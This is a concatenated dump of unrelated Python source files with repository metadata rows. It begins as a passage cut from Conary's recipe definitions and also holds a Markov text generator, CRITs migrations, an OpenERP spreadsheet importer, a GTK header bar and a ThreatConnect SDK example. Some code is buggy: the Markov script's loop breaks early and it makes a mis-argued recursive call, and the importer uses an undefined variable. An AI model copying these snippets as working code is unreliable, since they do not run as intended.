If the standard C{Configure()}, C{Make()}, and C{MakeInstall()} methods
are insufficient for your package requirements, you should define your own
methods to override them.
Of the three methods, C{Configure}, and C{Make} are least likely to be
insufficient, and require overriding for the majority of recipes using
C{AutoPackageRecipe}.
EXAMPLE
=======
C{class Gimp(AutoPackageRecipe):}
Defines the class for a GNU Image Manipulation Program (Gimp) recipe using
C{AutoPackageRecipe}.
"""
Flags = use.LocalFlags
name = 'autopackage'
internalAbstractBaseClass = 1
def setup(r):
r.unpack()
r.configure()
r.make()
r.makeinstall()
r.policy()
def unpack(r):
pass
def configure(r):
r.Configure()
def make(r):
r.Make()
def makeinstall(r):
r.MakeInstall()
def policy(r):
pass'''
UserInfoRecipe = '''class UserInfoRecipe(UserGroupInfoRecipe,
BaseRequiresRecipe):
"""
NAME
====
B{C{UserInfoRecipe}} - Build user info packages
SYNOPSIS
========
C{UserInfoRecipe} is used to create packages that define a system user
DESCRIPTION
===========
The C{UserInfoRecipe} class provides an interface to define a system
user through the C{r.User} method. The C{r.User} method is also
available in the C{PackageRecipe} class.
EXAMPLE
=======
A sample class that uses C{UserInfoRecipe} to define a user::
class ExamplePackage(UserInfoRecipe):
name = 'info-example'
version = '1.0'
def setup(r):
r.User('example', 500)
"""
name = 'userinfo'
internalAbstractBaseClass = 1'''
RedirectRecipe = '''class RedirectRecipe(_RedirectRecipe, BaseRequiresRecipe):
name = 'redirect'
internalAbstractBaseClass = 1'''
FilesetRecipe = '''class FilesetRecipe(_FilesetRecipe, BaseRequiresRecipe):
name = 'fileset'
internalAbstractBaseClass = 1'''
GroupInfoRecipe = '''class GroupInfoRecipe(UserGroupInfoRecipe,
BaseRequiresRecipe):
"""
NAME
====
B{C{GroupInfoRecipe}} - Build group info packages
SYNOPSIS
========
C{GroupInfoRecipe} is used to create packages that define a system group
DESCRIPTION
===========
The C{GroupInfoRecipe} class provides an interface to define a system
group through the C{r.Group} method. The C{r.Group} method is also
available in the C{PackageRecipe} class.
The C{GroupInfoRecipe} class should be used if a system group must exist
independently from any system users.
EXAMPLE
=======
A sample class that uses C{GroupInfoRecipe} to define a group::
class ExamplePackage(GroupInfoRecipe):
name = 'info-example'
version = '1.0'
def setup(r):
r.Group('example', 500)
"""
name = 'groupinfo'
internalAbstractBaseClass = 1'''
DerivedPackageRecipe = '''class DerivedPackageRecipe(AbstractDerivedPackageRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{DerivedPackageRecipe}} - Build derived packages
SYNOPSIS
========
C{DerivedPackageRecipe} is used to modify shadows of existing binary
packages
DESCRIPTION
===========
The C{DerivedPackageRecipe} class provides an interface to modify the
contents of a shadowed binary trove without recooking from source.
To use this recipe class, first shadow the upstream package, then change
the recipe.
EXAMPLE
=======
A sample class that uses DerivedPackageRecipe to replace contents of
a config file::
class ExamplePackage(DerivedPackageRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.Replace('foo', 'bar', '/etc/example.conf')
"""
name = 'derivedpackage'
internalAbstractBaseClass = 1'''
CapsuleRecipe = '''class CapsuleRecipe(AbstractCapsuleRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{CapsuleRecipe}} - Build Capsule packages
SYNOPSIS
========
C{CapsuleRecipe} is used to create a package that contains an unmodified,
foreign package.
DESCRIPTION
===========
The C{CapsuleRecipe} class provides an interface to create a capsule
package. A capsule package encapsulates an unmodified, foreign package that
is created by another packaging system. Currently only RPM is supported.
When a capsule package is installed or updated, the actual install or update
is done by Conary calling the other packaging system.
EXAMPLE
=======
A sample class that uses CapsuleRecipe to create a Conary capsule package
containing a single RPM::
class ExamplePackage(CapsuleRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.addCapsule('foo.rpm')
"""
name = 'capsule'
internalAbstractBaseClass = 1
buildRequires = [
'bzip2:runtime',
'gzip:runtime',
'tar:runtime',
'cpio:runtime',
'patch:runtime',
]'''
DerivedCapsuleRecipe = '''class DerivedCapsuleRecipe(AbstractDerivedCapsuleRecipe, BaseRequiresRecipe):
"""
NAME
====
B{C{DerivedCapsuleRecipe}} - Build derived capsule packages
SYNOPSIS
========
C{DerivedCapsuleRecipe} is used to modify shadows of existing binary
capsule packages
DESCRIPTION
===========
The C{DerivedCapsuleRecipe} class provides an interface to modify the
contents of a binary trove which contains a capsule without
recooking from source.
To use this recipe class, first shadow the upstream package, then change
the recipe.
Note that the Remove build action is not supported for files defined within
a capsule.
EXAMPLE
=======
A sample class that uses DerivedCapsuleRecipe to replace contents of
a config file::
class ExampleCapsule(DerivedCapsuleRecipe):
name = 'example'
version = '1.0'
def setup(r):
r.Replace('foo', 'bar', '/etc/example.conf')
"""
name = 'derivedcapsule'
internalAbstractBaseClass = 1'''
recipeNames = {'baserequires': 'BaseRequiresRecipe',
'package': 'PackageRecipe',
'buildpackage': 'BuildPackageRecipe',
'cpackage': 'CPackageRecipe',
'autopackage': 'AutoPackageRecipe',
'userinfo': 'UserInfoRecipe',
'groupinfo': 'GroupInfoRecipe',
'derivedpackage': 'DerivedPackageRecipe',
'group': 'GroupRecipe',
'groupset': 'GroupSetRecipe',
'redirect': 'RedirectRecipe',
'fileset': 'FilesetRecipe',
'capsule': 'CapsuleRecipe',
'derivedcapsule': 'DerivedCapsuleRecipe',
}
packageNames = dict([(x[1], x[0]) for x in recipeNames.iteritems()])
import sys
defaultRecipes = dict([(x[0], sys.modules[__name__].__dict__[x[1]]) for x in recipeNames.iteritems()])
| fedora-conary/conary | conary/build/defaultrecipes.py | Python | apache-2.0 | 27,584 | 0.000435 |
import random
def markov_analysis( fname, n ):
"""Reads a text file and perfom Markov analysis.
Return a dictionary that maps from prefixes to a collection of suffixes.
fname: a text file
n: n order
"""
d = {}
prefix = tuple()
fin = open( fname )
for line in fin:
words = line.strip().split()
for word in words:
if len( prefix ) < 2:
prefix += ( word, )
break
# if there is no entry for this prefix,
#make one d[prefix] = [word]
if d.setdefault( prefix, [word] ):
d[prefix].append( word )
prefix = prefix[1:] + ( word, )
return d
def generate_random_text( suffix_map, n ):
"""Generates a random text with n words based on the Markov analysis.
"""
prefix = random.choice( suffix_map.keys() )
for i in range( n ):
suffixes = suffix_map.get( prefix, None )
if suffixes == None:
# if the start isn't in map, wo got to the end of the
# original text, so we have to start again.
generate_random_text( n - i )
return
word = random.choice( suffixes )
print word,
prefix = prefix[1:] + ( word, )
generate_random_text( markov_analysis( 'emma.txt', 2 ), 100 )
| JohnHwee/show-me-the-code | Python/0052/main.py | Python | gpl-2.0 | 1,327 | 0.024115 |
def migrate_ip(self):
"""
Migrate to the latest schema version.
"""
migrate_1_to_2(self)
migrate_2_to_3(self)
def migrate_2_to_3(self):
"""
Migrate from schema 2 to 3.
"""
if self.schema_version < 2:
migrate_1_to_2(self)
if self.schema_version == 2:
self.schema_version = 3
self.save()
self.reload()
def migrate_1_to_2(self):
"""
Migrate from schema 1 to 2.
"""
if self.schema_version < 1:
migrate_0_to_1(self)
if self.schema_version == 1:
from crits.core.core_migrate import migrate_analysis_results
migrate_analysis_results(self)
self.schema_version = 2
self.save()
self.reload()
def migrate_0_to_1(self):
"""
Migrate from schema 0 to 1.
"""
if self.schema_version < 1:
self.schema_version = 1
| Lambdanaut/crits | crits/ips/migrate.py | Python | mit | 869 | 0.003452 |
async def fun():
"""Note coroutine function must be declared with async def."""
async for a in b:
if a > 5:
break
else:
continue
| pyta-uoft/pyta | examples/ending_locations/async_for.py | Python | gpl-3.0 | 169 | 0 |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 12 09:56:42 2012
@author: truiz
"""
from sys import argv
import xlrd
import xmlrpclib
from datetime import datetime
from ustr_test import ustr
def loadProjectsTasks(fileName, HOST, PORT, DB, USER, PASS):
ISSUES_PAGE = 0
TASKS_PAGE = 1
WORKS_PAGE = 2
''' Objects needed for rpc calls '''
url = 'http://%s:%d/xmlrpc/' % (HOST, PORT)
common_proxy = xmlrpclib.ServerProxy(url+'common')
object_proxy = xmlrpclib.ServerProxy(url+'object')
wizard_proxy = xmlrpclib.ServerProxy(url+'wizard')
workflow_proxy = xmlrpclib.ServerProxy(url+'workflow')
uid = common_proxy.login(DB, USER, PASS)
ID_ADDR = 1
def clean(cadena):
if isinstance(cadena, str):
return cadena and ustr(cadena).strip() or None
return cadena
def cleanDict(d):
res = {}
for k in d:
if not d[k] is None:
res.update({k: d[k]})
return res
def readSheet(fileName, nSheet):
# Open workbook
book = xlrd.open_workbook(fileName, formatting_info=True)
sheet = book.sheet_by_index(nSheet)
values = []
for T in range(sheet.nrows):
values.append([clean(v) for v in sheet.row_values(T)])
return values
def searchTasks(project_id, tasks):
res = []
for t in tasks:
if t[0] != 'ID':
if int(t[1]) == project_id:
res.append(t)
return res
def searchWorks(task_id, works):
res = []
for w in works:
if w[0] != 'ID TASK':
if int(w[0]) == task_id:
res.append(w)
return res
# Read project issue sheet
issues = readSheet(fileName, ISSUES_PAGE)
# Read project tasks sheet
tasks = readSheet(fileName, TASKS_PAGE)
# Read project work sheet
works = readSheet(fileName, WORKS_PAGE)
for issue in issues:
if issue[0] != 'ID':
if issue[4]:
user_mail = object_proxy.execute(
DB, uid, PASS, 'res.users', 'read', int(issue[4]),
['user_email'])
else:
user_mail['user_email'] = None
addr = issue[7] and (int(issue[
7]) == 3 and ID_ADDR or int(issue[7])) or None
values_issue = {
'name': ustr(issue[1]),
'categ_id': int(issue[3]),
'project_id': int(issue[2]),
'assigned_to': issue[4] and int(issue[4]) or None,
'type_id': int(issue[5]),
'partner_id': int(issue[6]),
'partner_address_id': addr,
'state': 'open',
'description': ustr(issue[8]),
'email_from': issue[4] and user_mail['user_email'] or None,
'active': True,
}
values_issue = cleanDict(values_issue)
project_id = object_proxy.execute(
DB, uid, PASS, 'project.issue', 'create', values_issue)
if project_id:
if issue[4]:
object_proxy.execute(DB, uid, PASS, 'project.issue',
'write', [
project_id],
{'assigned_to': int(issue[4]),
'user_id': int(issue[4])})
project_tasks = searchTasks(int(issue[0]), tasks)
if project_tasks:
for task in project_tasks:
values_tasks = {
'name': values_issue['name'],
'project_id': values_issue['project_id'],
'assigned_to': values_issue['assigned_to'],
'user_id': values_issue['assigned_to'],
'planned_hours': task[2],
'remaining_hours': task[3],
'type_id': values_issue['type_id'],
'partner_id': values_issue['partner_id'],
'state': 'open',
'date_start': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'date_end': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'description': values_issue['description'],
}
values_tasks = cleanDict(values_tasks)
task_id = object_proxy.execute(
DB, uid, PASS, 'project.task', 'create', values_tasks)
if task_id:
object_proxy.execute(DB, uid, PASS,
'project.issue', 'write', [
project_id],
{'task_id': task_id})
task_works = searchWorks(int(task[0]), works)
if task_works:
for work in task_works:
values_works = {
'name': ustr(work[1]),
'hours': work[2],
'date': datetime.now().strftime("%Y/%m/%d %H:%M:%S"),
'user_id': values_issue['assigned_to'],
'task_id': task_id,
}
work_id = object_proxy.execute(
DB, uid, PASS, 'project.task.work',
'create', values_works)
if work_id:
object_proxy.execute(DB, uid, PASS,
'project.task', 'write', [
task_id], {'state': task[4]})
object_proxy.execute(DB, uid, PASS, 'project.issue', 'write', [
project_id], {'state': issue[9]})
| 3dfxsoftware/cbss-addons | issue_load/wizard/migrate.py | Python | gpl-2.0 | 6,250 | 0.00128 |
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gio
UI_PATH = '/io/github/ImEditor/ui/'
class ImEditorHeaderBar():
__gtype_name__ = 'ImEditorHeaderBar'
def __init__(self):
builder = Gtk.Builder.new_from_resource(UI_PATH + 'headerbar.ui')
self.header_bar = builder.get_object('header_bar')
self.menu_button = builder.get_object('menu_button')
self.select_button = builder.get_object('select_button')
self.pencil_button = builder.get_object('pencil_button')
builder.add_from_resource(UI_PATH + 'menu.ui')
self.window_menu = builder.get_object('window-menu')
self.menu_button.set_menu_model(self.window_menu)
| ImEditor/ImEditor | src/interface/headerbar.py | Python | gpl-3.0 | 711 | 0.004219 |
# -*- coding: utf-8 -*-
""" standard """
from random import randint
import re
""" custom """
from examples.working_init import *
from threatconnect.Config.ResourceType import ResourceType
#
# CHANGE FOR YOUR TESTING ENVIRONMENT
# - These incidents must be created before running this script
#
owner = 'Example Community' # org or community
lu_id = 34 # incident id for loop update
mu_id = 35 # incident id for manual update
# dl_id = 999999 # threat id to delete
adversary_id = 5 # adversary resource id to associate with incident
victim_id = 1 # victim resource id to associate with incident
ip_address = '10.20.30.40' # email address to associate to adversary
rn = randint(1, 1000) # random number generator for testing
def main():
""" """
# (Optional) SET THREAT CONNECT LOG (TCL) LEVEL
tc.set_tcl_file('log/tc.log', 'debug')
tc.set_tcl_console_level('critical')
# (Required) Instantiate a Resource Object
resources = tc.incidents()
#
# (Optional) retrieve results from API and update selected resource in loop
#
# filters can be set to limit search results
try:
filter1 = resources.add_filter()
filter1.add_owner(owner) # filter on owner
except AttributeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
try:
resources.retrieve()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
for res in resources:
# a particular resource can be matched by ID, Name or any other supported attribute
if res.id == lu_id:
#
# once a resource is matched any metadata on that resource can be updated
#
res.set_name('LU Incident #{0:d}'.format(rn))
# additional properties can be updated
res.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
#
# working with indicator associations
#
# existing indicator associations can be retrieved and iterated through
for association in res.indicator_associations:
# add delete flag to all indicator association that have a confidence under 10
if association.confidence < 10:
res.disassociate_indicator(association.resource_type, association.indicator)
# indicator associations can be added to a resource by providing the resource type and value
res.associate_indicator(ResourceType.ADDRESSES, ip_address)
#
# working with group associations
#
# existing group associations can be retrieved and iterated through
for association in res.group_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_group(association.resource_type, association.id)
# group associations can be added to a resource by providing the resource type and id
res.associate_group(ResourceType.ADVERSARIES, adversary_id)
#
# working with victim associations
#
# existing victim associations can be retrieved and iterated through
for association in res.victim_associations:
# add delete flag to all group association that match DELETE
if re.findall('LU', association.name):
res.disassociate_victim(association.id)
# victim associations can be added to a resource by providing the resource id
res.associate_victim(victim_id)
#
# working with attributes
#
# existing attributes can be loaded into the resource and iterated through
res.load_attributes()
for attribute in res.attributes:
# add delete flag to all attributes that have 'test' in the value.
if re.findall('test', attribute.value):
res.delete_attribute(attribute.id)
# add update flag to all attributes that have 'update' in the value.
if re.findall('update', attribute.value):
res.update_attribute(attribute.id, 'updated attribute #{0:d}'.format(rn))
# attributes can be added to a resource by providing the attribute type and value
res.add_attribute('Description', 'test attribute #{0:d}'.format(rn))
#
# working with tags
#
# existing tags can be loaded into the resource and iterated through
res.load_tags()
for tag in res.tags:
# add delete flag to all tags that have 'DELETE' in the name.
if re.findall('DELETE', tag.name):
res.delete_tag(tag.name)
# tags can be added to a resource by providing the tags value
res.add_tag('DELETE #{0:d}'.format(rn))
# (Required) commit this resource
try:
print('Updating resource {0!s}.'.format(res.name))
res.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) delete resource if required
#
# delete to any resource that has 'DELETE' in the name.
elif re.findall('DELETE', res.name):
try:
print('Deleting resource {0!s}.'.format(res.name))
res.delete() # this action is equivalent to commit
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) ADD RESOURCE EXAMPLE
#
# new resources can be added with the resource add method
resource = resources.add('DELETE #{0:d}'.format(rn), owner)
# additional properties can be added
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# attributes can be added to the new resource
resource.add_attribute('Description', 'Delete Example #{0:d}'.format(rn))
# tags can be added to the new resource
resource.add_tag('TAG #{0:d}'.format(rn))
# the security label can be set on the new resource
resource.set_security_label('TLP Green')
# commit this resource and add attributes, tags and security labels
try:
print('Adding resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) UPDATE RESOURCE EXAMPLE
#
# existing resources can also be updated with the resource add method
resource = resources.add('MU Incident #{0:d}'.format(rn), owner) # this will overwrite exising resource name
resource.set_id(mu_id) # set the id to the existing resource
# additional properties can be updated
resource.set_event_date('2015-03-{0:d}T00:00:00Z'.format(randint(1, 30)))
# existing attributes can be loaded for modification or deletion
resource.load_attributes()
for attribute in resource.attributes:
if attribute.type == 'Description':
resource.delete_attribute(attribute.id)
# attributes can be added to the existing resource
resource.add_attribute('Description', 'Manual Update Example #{0:d}'.format(rn))
# existing tags can be loaded for modification or deletion
resource.load_tags()
for tag in resource.tags:
resource.delete_tag(tag.name)
# tags can be added to the existing resource
resource.add_tag('TAG #{0:d}'.format(rn))
# commit this resource and add attributes, tags and security labels
try:
print('Updating resource {0!s}.'.format(resource.name))
resource.commit()
except RuntimeError as e:
print('Error: {0!s}'.format(e))
sys.exit(1)
#
# (Optional) DELETE RESOURCE EXAMPLE
#
# resources can be deleted with the resource add method
# resource = resources.add(''.format(rn), owner) # a valid resource name is not required
# resource.set_id(dl_id)
#
# # delete this resource
# try:
# resource.delete()
# except RuntimeError as e:
# print(e)
# (Optional) DISPLAY A COMMIT REPORT
print(tc.report.stats)
# display any failed api calls
for fail in tc.report.failures:
print(fail)
if __name__ == "__main__":
main()
sys.exit()
| percipient/threatconnect-python | examples/commit/incidents_commit.py | Python | apache-2.0 | 8,526 | 0.002698 |